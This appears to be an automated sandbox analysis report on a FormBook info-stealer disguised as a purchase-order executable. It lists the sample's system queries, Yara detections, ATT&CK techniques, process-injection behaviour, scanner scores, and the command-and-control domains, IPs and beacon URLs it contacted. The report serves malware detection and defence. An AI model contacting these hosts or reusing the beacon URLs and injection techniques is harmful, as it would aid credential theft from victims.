          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.PO-RFQ # 097663899.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383978 Sample: PO-RFQ # 097663899.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.xiaoqiche.net 2->31 33 www.almosting.com 2->33 35 alrighting.xshoppy.shop 2->35 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 6 other signatures 2->49 11 PO-RFQ # 097663899.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\PO-RFQ # 097663899.exe.log, ASCII 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 PO-RFQ # 097663899.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.farmacyfastfood.com 212.237.249.116, 49728, 80 ZITCOMDK Denmark 18->37 39 kopebitest.com 103.253.212.249, 49724, 80 RUMAHWEB-AS-IDRumahwebIndonesiaCVID Indonesia 18->39 41 15 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 systray.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO-RFQ # 097663899.exe30%VirustotalBrowse
          PO-RFQ # 097663899.exe27%ReversingLabsWin32.Trojan.Woreflint
          PO-RFQ # 097663899.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.PO-RFQ # 097663899.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.kopebitest.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.agarkovsport.online/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc50%Avira URL Cloudsafe
          www.aquaroyaume.com/uabu/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.salesenablementlaunch.com/uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0ut0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.mayipay9.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEY0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.globalperfumery.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY130%Avira URL Cloudsafe
          http://www.bigbuddyco.com/uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut0%Avira URL Cloudsafe
          http://www.aquaroyaume.com/uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0ut0%Avira URL Cloudsafe
          http://www.oldschoolnews.net/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          alrighting.xshoppy.shop
          75.2.113.213
          truefalse
            unknown
            www.farmacyfastfood.com
            212.237.249.116
            truetrue
              unknown
              bigbuddyco.com
              160.153.136.3
              truetrue
                unknown
                parkingpage.namecheap.com
                198.54.117.218
                truefalse
                  high
                  www.aquaroyaume.com
                  185.107.56.197
                  truetrue
                    unknown
                    www.agarkovsport.online
                    209.99.40.222
                    truetrue
                      unknown
                      salesenablementlaunch.com
                      34.102.136.180
                      truefalse
                        unknown
                        www.globalperfumery.com
                        94.136.40.51
                        truetrue
                          unknown
                          kopebitest.com
                          103.253.212.249
                          truetrue
                            unknown
                            mayipay9.com
                            34.102.136.180
                            truefalse
                              unknown
                              www.kopebitest.com
                              unknown
                              unknowntrue
                                unknown
                                www.almosting.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.mayipay9.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.ahaal20.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.oldschoolnews.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.qingniang.club
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.xiaoqiche.net
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.salesenablementlaunch.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.lattakia-imbiss.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.bigbuddyco.com
                                                unknown
                                                unknowntrue
                                                  unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.kopebitest.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktutrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.agarkovsport.online/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc5true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  www.aquaroyaume.com/uabu/true
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://www.salesenablementlaunch.com/uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0utfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.mayipay9.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=RBOjcSI+0PCin3DYAfURe2BWN4BeTm/4XrPmNHFHgtwunN92sbbb7RERPNQIss2FkGEYfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.globalperfumery.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY13true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.bigbuddyco.com/uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0uttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.aquaroyaume.com/uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0uttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.oldschoolnews.net/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiytrue
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.0PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designersGPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/?PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/bThePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers?PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                            high
                                                            https://www.gnu.org/licenses/PO-RFQ # 097663899.exefalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4PO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.tiro.comexplorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  high
